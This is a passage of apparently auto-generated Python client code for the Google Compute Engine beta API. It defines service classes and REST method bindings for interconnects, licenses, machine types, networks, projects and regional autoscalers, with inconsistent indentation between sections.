List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.interconnects.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/interconnects',
request_field='',
request_type_name=u'ComputeInterconnectsListRequest',
response_type_name=u'InterconnectList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Updates the specified interconnect with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeInterconnectsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.interconnects.patch',
ordered_params=[u'project', u'interconnect'],
path_params=[u'interconnect', u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/interconnects/{interconnect}',
request_field=u'interconnectResource',
request_type_name=u'ComputeInterconnectsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an Interconnect. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeInterconnectsSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeInterconnectsSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeInterconnectsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.interconnects.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/interconnects/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeInterconnectsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
  class LicenseCodesService(base_api.BaseApiService):
    """Service class for the licenseCodes resource.
    Exposes the single read-only REST call available on the compute beta
    `licenseCodes` collection.
    """
    _NAME = u'licenseCodes'
    def __init__(self, client):
      super(ComputeBeta.LicenseCodesService, self).__init__(client)
      # No media-upload methods on this resource, so the registry stays empty.
      self._upload_configs = {
          }
    def Get(self, request, global_params=None):
      """Return a specified license code. License codes are mirrored across all projects that have permissions to read the License Code.
      Args:
        request: (ComputeLicenseCodesGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (LicenseCode) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Declarative HTTP binding; the lambda defers building the ApiMethodInfo
    # message until the config is actually requested.
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.licenseCodes.get',
        ordered_params=[u'project', u'licenseCode'],
        path_params=[u'licenseCode', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/licenseCodes/{licenseCode}',
        request_field='',
        request_type_name=u'ComputeLicenseCodesGetRequest',
        response_type_name=u'LicenseCode',
        supports_download=False,
    )
  class LicensesService(base_api.BaseApiService):
    """Service class for the licenses resource.
    Each public method issues one REST call against the compute beta
    `licenses` collection; the HTTP binding for every method is held in the
    corresponding `method_config` lambda.
    """
    _NAME = u'licenses'
    def __init__(self, client):
      super(ComputeBeta.LicensesService, self).__init__(client)
      # No media-upload methods on this resource, so the registry stays empty.
      self._upload_configs = {
          }
    def Delete(self, request, global_params=None):
      """Deletes the specified license.
      Args:
        request: (ComputeLicensesDeleteRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Delete')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Declarative HTTP binding for each method; the lambda defers construction
    # of the ApiMethodInfo message until the config is actually requested.
    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.licenses.delete',
        ordered_params=[u'project', u'license'],
        path_params=[u'license', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/licenses/{license}',
        request_field='',
        request_type_name=u'ComputeLicensesDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def Get(self, request, global_params=None):
      """Returns the specified License resource.
      Args:
        request: (ComputeLicensesGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (License) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.licenses.get',
        ordered_params=[u'project', u'license'],
        path_params=[u'license', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/licenses/{license}',
        request_field='',
        request_type_name=u'ComputeLicensesGetRequest',
        response_type_name=u'License',
        supports_download=False,
    )
    def Insert(self, request, global_params=None):
      """Create a License resource in the specified project.
      Args:
        request: (ComputeLicensesInsertRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Insert')
      return self._RunMethod(
          config, request, global_params=global_params)
    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.licenses.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/licenses',
        request_field=u'license',
        request_type_name=u'ComputeLicensesInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def List(self, request, global_params=None):
      """Retrieves the list of licenses available in the specified project. This method does not get any licenses that belong to other projects, including licenses attached to publicly-available images, like Debian 8. If you want to get a list of publicly-available licenses, use this method to make a request to the respective image project, such as debian-cloud or windows-cloud.
      Args:
        request: (ComputeLicensesListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (LicensesListResponse) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)
    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.licenses.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/licenses',
        request_field='',
        request_type_name=u'ComputeLicensesListRequest',
        response_type_name=u'LicensesListResponse',
        supports_download=False,
    )
  class MachineTypesService(base_api.BaseApiService):
    """Service class for the machineTypes resource.
    Read-only accessors for the compute beta `machineTypes` collection; the
    HTTP binding for every method is held in its `method_config` lambda.
    """
    _NAME = u'machineTypes'
    def __init__(self, client):
      super(ComputeBeta.MachineTypesService, self).__init__(client)
      # No media-upload methods on this resource, so the registry stays empty.
      self._upload_configs = {
          }
    def AggregatedList(self, request, global_params=None):
      """Retrieves an aggregated list of machine types.
      Args:
        request: (ComputeMachineTypesAggregatedListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (MachineTypeAggregatedList) The response message.
      """
      config = self.GetMethodConfig('AggregatedList')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Declarative HTTP binding for each method; the lambda defers construction
    # of the ApiMethodInfo message until the config is actually requested.
    AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.aggregatedList',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/aggregated/machineTypes',
        request_field='',
        request_type_name=u'ComputeMachineTypesAggregatedListRequest',
        response_type_name=u'MachineTypeAggregatedList',
        supports_download=False,
    )
    def Get(self, request, global_params=None):
      """Returns the specified machine type. Gets a list of available machine types by making a list() request.
      Args:
        request: (ComputeMachineTypesGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (MachineType) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.get',
        ordered_params=[u'project', u'zone', u'machineType'],
        path_params=[u'machineType', u'project', u'zone'],
        query_params=[],
        relative_path=u'projects/{project}/zones/{zone}/machineTypes/{machineType}',
        request_field='',
        request_type_name=u'ComputeMachineTypesGetRequest',
        response_type_name=u'MachineType',
        supports_download=False,
    )
    def List(self, request, global_params=None):
      """Retrieves a list of machine types available to the specified project.
      Args:
        request: (ComputeMachineTypesListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (MachineTypeList) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)
    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.machineTypes.list',
        ordered_params=[u'project', u'zone'],
        path_params=[u'project', u'zone'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/zones/{zone}/machineTypes',
        request_field='',
        request_type_name=u'ComputeMachineTypesListRequest',
        response_type_name=u'MachineTypeList',
        supports_download=False,
    )
  class NetworksService(base_api.BaseApiService):
    """Service class for the networks resource.
    Each public method issues one REST call against the compute beta
    `networks` collection; the HTTP binding for every method is held in the
    corresponding `method_config` lambda.
    """
    _NAME = u'networks'
    def __init__(self, client):
      super(ComputeBeta.NetworksService, self).__init__(client)
      # No media-upload methods on this resource, so the registry stays empty.
      self._upload_configs = {
          }
    def AddPeering(self, request, global_params=None):
      """Adds a peering to the specified network.
      Args:
        request: (ComputeNetworksAddPeeringRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('AddPeering')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Declarative HTTP binding for each method; the lambda defers construction
    # of the ApiMethodInfo message until the config is actually requested.
    AddPeering.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.addPeering',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks/{network}/addPeering',
        request_field=u'networksAddPeeringRequest',
        request_type_name=u'ComputeNetworksAddPeeringRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def Delete(self, request, global_params=None):
      """Deletes the specified network.
      Args:
        request: (ComputeNetworksDeleteRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Delete')
      return self._RunMethod(
          config, request, global_params=global_params)
    Delete.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'DELETE',
        method_id=u'compute.networks.delete',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks/{network}',
        request_field='',
        request_type_name=u'ComputeNetworksDeleteRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def Get(self, request, global_params=None):
      """Returns the specified network. Get a list of available networks by making a list() request.
      Args:
        request: (ComputeNetworksGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Network) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.networks.get',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{network}',
        request_field='',
        request_type_name=u'ComputeNetworksGetRequest',
        response_type_name=u'Network',
        supports_download=False,
    )
    def Insert(self, request, global_params=None):
      """Creates a network in the specified project using the data included in the request.
      Args:
        request: (ComputeNetworksInsertRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Insert')
      return self._RunMethod(
          config, request, global_params=global_params)
    Insert.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.insert',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks',
        request_field=u'network',
        request_type_name=u'ComputeNetworksInsertRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def List(self, request, global_params=None):
      """Retrieves the list of networks available to the specified project.
      Args:
        request: (ComputeNetworksListRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (NetworkList) The response message.
      """
      config = self.GetMethodConfig('List')
      return self._RunMethod(
          config, request, global_params=global_params)
    List.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.networks.list',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
        relative_path=u'projects/{project}/global/networks',
        request_field='',
        request_type_name=u'ComputeNetworksListRequest',
        response_type_name=u'NetworkList',
        supports_download=False,
    )
    def Patch(self, request, global_params=None):
      """Patches the specified network with the data included in the request. Only the following fields can be modified: routingConfig.routingMode.
      Args:
        request: (ComputeNetworksPatchRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('Patch')
      return self._RunMethod(
          config, request, global_params=global_params)
    Patch.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'PATCH',
        method_id=u'compute.networks.patch',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks/{network}',
        request_field=u'networkResource',
        request_type_name=u'ComputeNetworksPatchRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def RemovePeering(self, request, global_params=None):
      """Removes a peering from the specified network.
      Args:
        request: (ComputeNetworksRemovePeeringRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('RemovePeering')
      return self._RunMethod(
          config, request, global_params=global_params)
    RemovePeering.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.removePeering',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks/{network}/removePeering',
        request_field=u'networksRemovePeeringRequest',
        request_type_name=u'ComputeNetworksRemovePeeringRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def SwitchToCustomMode(self, request, global_params=None):
      """Switches the network mode from auto subnet mode to custom subnet mode.
      Args:
        request: (ComputeNetworksSwitchToCustomModeRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('SwitchToCustomMode')
      return self._RunMethod(
          config, request, global_params=global_params)
    SwitchToCustomMode.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.switchToCustomMode',
        ordered_params=[u'project', u'network'],
        path_params=[u'network', u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/global/networks/{network}/switchToCustomMode',
        request_field='',
        request_type_name=u'ComputeNetworksSwitchToCustomModeRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def TestIamPermissions(self, request, global_params=None):
      """Returns permissions that a caller has on the specified resource.
      Args:
        request: (ComputeNetworksTestIamPermissionsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (TestPermissionsResponse) The response message.
      """
      config = self.GetMethodConfig('TestIamPermissions')
      return self._RunMethod(
          config, request, global_params=global_params)
    TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.networks.testIamPermissions',
        ordered_params=[u'project', u'resource'],
        path_params=[u'project', u'resource'],
        query_params=[],
        relative_path=u'projects/{project}/global/networks/{resource}/testIamPermissions',
        request_field=u'testPermissionsRequest',
        request_type_name=u'ComputeNetworksTestIamPermissionsRequest',
        response_type_name=u'TestPermissionsResponse',
        supports_download=False,
    )
  class ProjectsService(base_api.BaseApiService):
    """Service class for the projects resource.
    Each public method issues one REST call against the compute beta
    `projects` collection; the HTTP binding for every method is held in the
    corresponding `method_config` lambda.
    """
    _NAME = u'projects'
    def __init__(self, client):
      super(ComputeBeta.ProjectsService, self).__init__(client)
      # No media-upload methods on this resource, so the registry stays empty.
      self._upload_configs = {
          }
    def DisableXpnHost(self, request, global_params=None):
      """Disable this project as a shared VPC host project.
      Args:
        request: (ComputeProjectsDisableXpnHostRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('DisableXpnHost')
      return self._RunMethod(
          config, request, global_params=global_params)
    # Declarative HTTP binding for each method; the lambda defers construction
    # of the ApiMethodInfo message until the config is actually requested.
    DisableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.disableXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/disableXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsDisableXpnHostRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def DisableXpnResource(self, request, global_params=None):
      """Disable a service resource (a.k.a service project) associated with this host project.
      Args:
        request: (ComputeProjectsDisableXpnResourceRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('DisableXpnResource')
      return self._RunMethod(
          config, request, global_params=global_params)
    DisableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.disableXpnResource',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/disableXpnResource',
        request_field=u'projectsDisableXpnResourceRequest',
        request_type_name=u'ComputeProjectsDisableXpnResourceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def EnableXpnHost(self, request, global_params=None):
      """Enable this project as a shared VPC host project.
      Args:
        request: (ComputeProjectsEnableXpnHostRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('EnableXpnHost')
      return self._RunMethod(
          config, request, global_params=global_params)
    EnableXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.enableXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/enableXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsEnableXpnHostRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def EnableXpnResource(self, request, global_params=None):
      """Enable service resource (a.k.a service project) for a host project, so that subnets in the host project can be used by instances in the service project.
      Args:
        request: (ComputeProjectsEnableXpnResourceRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('EnableXpnResource')
      return self._RunMethod(
          config, request, global_params=global_params)
    EnableXpnResource.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.enableXpnResource',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/enableXpnResource',
        request_field=u'projectsEnableXpnResourceRequest',
        request_type_name=u'ComputeProjectsEnableXpnResourceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def Get(self, request, global_params=None):
      """Returns the specified Project resource.
      Args:
        request: (ComputeProjectsGetRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Project) The response message.
      """
      config = self.GetMethodConfig('Get')
      return self._RunMethod(
          config, request, global_params=global_params)
    Get.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.get',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}',
        request_field='',
        request_type_name=u'ComputeProjectsGetRequest',
        response_type_name=u'Project',
        supports_download=False,
    )
    def GetXpnHost(self, request, global_params=None):
      """Gets the shared VPC host project that this project links to. May be empty if no link exists.
      Args:
        request: (ComputeProjectsGetXpnHostRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Project) The response message.
      """
      config = self.GetMethodConfig('GetXpnHost')
      return self._RunMethod(
          config, request, global_params=global_params)
    GetXpnHost.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.getXpnHost',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[],
        relative_path=u'projects/{project}/getXpnHost',
        request_field='',
        request_type_name=u'ComputeProjectsGetXpnHostRequest',
        response_type_name=u'Project',
        supports_download=False,
    )
    def GetXpnResources(self, request, global_params=None):
      """Gets service resources (a.k.a service project) associated with this host project.
      Args:
        request: (ComputeProjectsGetXpnResourcesRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (ProjectsGetXpnResources) The response message.
      """
      config = self.GetMethodConfig('GetXpnResources')
      return self._RunMethod(
          config, request, global_params=global_params)
    # NOTE: this method uses u'order_by' (snake_case) unlike the u'orderBy'
    # used elsewhere; this mirrors the upstream API surface as generated.
    GetXpnResources.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'GET',
        method_id=u'compute.projects.getXpnResources',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
        relative_path=u'projects/{project}/getXpnResources',
        request_field='',
        request_type_name=u'ComputeProjectsGetXpnResourcesRequest',
        response_type_name=u'ProjectsGetXpnResources',
        supports_download=False,
    )
    def ListXpnHosts(self, request, global_params=None):
      """Lists all shared VPC host projects visible to the user in an organization.
      Args:
        request: (ComputeProjectsListXpnHostsRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (XpnHostList) The response message.
      """
      config = self.GetMethodConfig('ListXpnHosts')
      return self._RunMethod(
          config, request, global_params=global_params)
    ListXpnHosts.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.listXpnHosts',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
        relative_path=u'projects/{project}/listXpnHosts',
        request_field=u'projectsListXpnHostsRequest',
        request_type_name=u'ComputeProjectsListXpnHostsRequest',
        response_type_name=u'XpnHostList',
        supports_download=False,
    )
    def MoveDisk(self, request, global_params=None):
      """Moves a persistent disk from one zone to another.
      Args:
        request: (ComputeProjectsMoveDiskRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('MoveDisk')
      return self._RunMethod(
          config, request, global_params=global_params)
    MoveDisk.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.moveDisk',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/moveDisk',
        request_field=u'diskMoveRequest',
        request_type_name=u'ComputeProjectsMoveDiskRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def MoveInstance(self, request, global_params=None):
      """Moves an instance and its attached persistent disks from one zone to another.
      Args:
        request: (ComputeProjectsMoveInstanceRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('MoveInstance')
      return self._RunMethod(
          config, request, global_params=global_params)
    MoveInstance.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.moveInstance',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/moveInstance',
        request_field=u'instanceMoveRequest',
        request_type_name=u'ComputeProjectsMoveInstanceRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def SetCommonInstanceMetadata(self, request, global_params=None):
      """Sets metadata common to all instances within the specified project using the data included in the request.
      Args:
        request: (ComputeProjectsSetCommonInstanceMetadataRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('SetCommonInstanceMetadata')
      return self._RunMethod(
          config, request, global_params=global_params)
    SetCommonInstanceMetadata.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.setCommonInstanceMetadata',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/setCommonInstanceMetadata',
        request_field=u'metadata',
        request_type_name=u'ComputeProjectsSetCommonInstanceMetadataRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def SetDefaultNetworkTier(self, request, global_params=None):
      """Sets the default network tier of the project. The default network tier is used when an address/forwardingRule/instance is created without specifying the network tier field.
      Args:
        request: (ComputeProjectsSetDefaultNetworkTierRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('SetDefaultNetworkTier')
      return self._RunMethod(
          config, request, global_params=global_params)
    SetDefaultNetworkTier.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.setDefaultNetworkTier',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/setDefaultNetworkTier',
        request_field=u'projectsSetDefaultNetworkTierRequest',
        request_type_name=u'ComputeProjectsSetDefaultNetworkTierRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
    def SetUsageExportBucket(self, request, global_params=None):
      """Enables the usage export feature and sets the usage export bucket where reports are stored. If you provide an empty request body using this method, the usage export feature will be disabled.
      Args:
        request: (ComputeProjectsSetUsageExportBucketRequest) input message
        global_params: (StandardQueryParameters, default: None) global arguments
      Returns:
        (Operation) The response message.
      """
      config = self.GetMethodConfig('SetUsageExportBucket')
      return self._RunMethod(
          config, request, global_params=global_params)
    SetUsageExportBucket.method_config = lambda: base_api.ApiMethodInfo(
        http_method=u'POST',
        method_id=u'compute.projects.setUsageExportBucket',
        ordered_params=[u'project'],
        path_params=[u'project'],
        query_params=[u'requestId'],
        relative_path=u'projects/{project}/setUsageExportBucket',
        request_field=u'usageExportLocation',
        request_type_name=u'ComputeProjectsSetUsageExportBucketRequest',
        response_type_name=u'Operation',
        supports_download=False,
    )
class RegionAutoscalersService(base_api.BaseApiService):
"""Service class for the regionAutoscalers resource."""
_NAME = u'regionAutoscalers'
def __init__(self, client):
super(ComputeBeta.RegionAutoscalersService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.regionAutoscalers.delete',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified autoscaler.
Args:
request: (ComputeRegionAutoscalersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Autoscaler) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.regionAutoscalers.get',
ordered_params=[u'project', u'region', u'autoscaler'],
path_params=[u'autoscaler', u'project', u'region'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/autoscalers/{autoscaler}',
request_field='',
request_type_name=u'ComputeRegionAutoscalersGetRequest',
response_type_name=u'Autoscaler',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an autoscaler in the specified project using the data included in the request.
Args:
request: (ComputeRegionAutoscalersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.regionAutoscalers.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/autoscalers',
request_field=u'autoscaler',
request_type_name=u'ComputeRegionAutoscalersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of autoscalers contained within the specified region.
Args:
request: (ComputeRegionAutoscalersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(RegionAutoscalerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
